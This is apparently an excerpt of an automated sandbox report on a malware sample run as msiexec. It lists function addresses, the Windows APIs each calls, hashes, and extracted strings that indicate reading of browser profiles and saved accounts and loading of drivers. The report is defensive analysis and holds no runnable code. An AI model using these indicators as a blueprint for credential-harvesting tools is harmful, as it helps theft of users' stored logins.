                                                                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID:
                                                                      • API String ID: 1889659487-0
                                                                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                      APIs
                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: NtdllProc_Window
                                                                      • String ID:
                                                                      • API String ID: 4255912815-0
                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                      APIs
                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                      • memset.MSVCRT ref: 0040265F
                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                      • API String ID: 577499730-1134094380
                                                                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                      • API String ID: 2787044678-1921111777
                                                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                      • GetDC.USER32 ref: 004140E3
                                                                      • wcslen.MSVCRT ref: 00414123
                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                      • String ID: %s:$EDIT$STATIC
                                                                      • API String ID: 2080319088-3046471546
                                                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                      • memset.MSVCRT ref: 00413292
                                                                      • memset.MSVCRT ref: 004132B4
                                                                      • memset.MSVCRT ref: 004132CD
                                                                      • memset.MSVCRT ref: 004132E1
                                                                      • memset.MSVCRT ref: 004132FB
                                                                      • memset.MSVCRT ref: 00413310
                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                      • memset.MSVCRT ref: 004133C0
                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                      Strings
                                                                      • {Unknown}, xrefs: 004132A6
                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                      • API String ID: 4111938811-1819279800
                                                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                      • String ID:
                                                                      • API String ID: 829165378-0
                                                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00404172
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                      • memset.MSVCRT ref: 00404200
                                                                      • memset.MSVCRT ref: 00404215
                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                      • memset.MSVCRT ref: 0040426E
                                                                      • memset.MSVCRT ref: 004042CD
                                                                      • memset.MSVCRT ref: 004042E2
                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                      • API String ID: 2454223109-1580313836
                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                      APIs
                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                      • API String ID: 4054529287-3175352466
                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                      • API String ID: 3143752011-1996832678
                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                      • API String ID: 667068680-2887671607
                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                      • API String ID: 1607361635-601624466
                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                      • API String ID: 2000436516-3842416460
                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                      APIs
                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                      • String ID:
                                                                      • API String ID: 1043902810-0
                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                      • API String ID: 2899246560-1542517562
                                                                      • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                      • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
